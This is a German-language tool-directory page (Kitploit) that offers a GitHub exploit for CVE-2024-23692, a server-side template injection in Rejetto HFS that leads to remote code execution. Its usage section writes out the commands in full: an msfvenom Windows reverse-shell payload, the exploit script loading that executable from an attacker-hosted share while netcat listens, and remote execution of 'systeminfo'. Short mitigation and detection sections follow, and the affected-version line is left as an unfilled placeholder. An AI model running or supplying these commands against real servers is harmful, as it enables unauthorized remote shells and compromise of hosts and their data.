Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-23692 — Rejetto HFS (HTTP File Server) ist ein einfacher Webserver für Dateien, der das Teilen von Dateien über ein Netzwerk oder das Internet ermöglicht. | Kitploit
Tools/GitHubGitHub/mr-r00t11/cve-2024-23692
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server) ist ein einfacher Webserver für Dateien, der das Teilen von Dateien über ein Netzwerk oder das Internet ermöglicht.

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Rejetto HFS (HTTP File Server) CVE-2024-23692 Schwachstelle


Übersicht

Rejetto HFS (HTTP File Server) ist ein einfacher Web-Dateiserver, der die Dateifreigabe über ein Netzwerk oder das Internet ermöglicht. Trotz seiner Benutzerfreundlichkeit und Einfachheit wurde eine kritische Schwachstelle (CVE-2024-23692) entdeckt, die den Server zu einem Ziel für Angreifer macht.


CVE-2024-23692: Server-Side Template Injection (SSTI) Schwachstelle


Beschreibung

CVE-2024-23692 ist eine Server-Side Template Injection (SSTI) Schwachstelle, die in Rejetto HFS identifiziert wurde. Diese Schwachstelle ermöglicht es einem Angreifer, bösartige Vorlagen auf dem Server zu injizieren und auszuführen. Bei Ausnutzung kann sie zu Remote-Code-Ausführung führen und möglicherweise den gesamten Server sowie die darauf gehosteten Daten gefährden.


Auswirkungen

Ein Angreifer, der diese Schwachstelle ausnutzt, kann:

  • Beliebigen Code auf dem Server ausführen
  • Unbefugten Zugriff auf sensible Daten erlangen
  • Die Integrität und Verfügbarkeit des Servers gefährden
  • Den kompromittierten Server nutzen, um weitere Angriffe im Netzwerk zu starten

Verwendung

Erhalten Sie eine Shell mithilfe einer bösartigen Binärdatei, die mit msfvenom erstellt wurde.

Hinweis: Lassen Sie nc lauschen.

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

Führen Sie einen Befehl remote aus.

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

Es kann ungefähr 15 Sekunden dauern, bis das Ergebnis angezeigt wird.

[Screenshot_2.png]


Betroffene Versionen

Alle Versionen von Rejetto HFS bis einschließlich Version [fügen Sie hier die neueste anfällige Version ein] sind von dieser Schwachstelle betroffen.


Gegenmaßnahmen

Um das durch CVE-2024-23692 verursachte Risiko zu mindern, wird Benutzern empfohlen:

  • Auf die neueste Version aktualisieren: Stellen Sie sicher, dass Sie eine Version von Rejetto HFS verwenden, in der diese Schwachstelle behoben wurde. Überprüfen Sie die offizielle Rejetto-HFS-Website oder das Repository auf die neuesten Updates.
  • Sicherheits-Best-Practices anwenden: Beschränken Sie den Zugriff auf den HFS-Server auf vertrauenswürdige Netzwerke und Benutzer. Verwenden Sie starke Authentifizierungs- und Autorisierungsmechanismen.
  • Überwachen und Prüfen: Überwachen Sie den Server regelmäßig auf ungewöhnliche Aktivitäten und prüfen Sie Protokolle auf Anzeichen von Ausnutzung.

Erkennung

Um festzustellen, ob Ihr Server kompromittiert wurde, achten Sie auf:

  • Ungewöhnlichen Netzwerkverkehr, der vom Server ausgeht
  • Unerwartete Dateien oder Prozesse auf dem Server
  • Unbefugte Änderungen an Serverkonfigurationen oder Daten

Melden und Unterstützung

Für weitere Unterstützung und Hilfe wenden Sie sich an die Rejetto-HFS-Community-Foren oder die offiziellen Support-Kanäle.


Ressourcen

  • Offizielle Rejetto-HFS-Website
  • CVE-2024-23692 Details

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die LICENSE-Datei für Details.


Tool herunterladen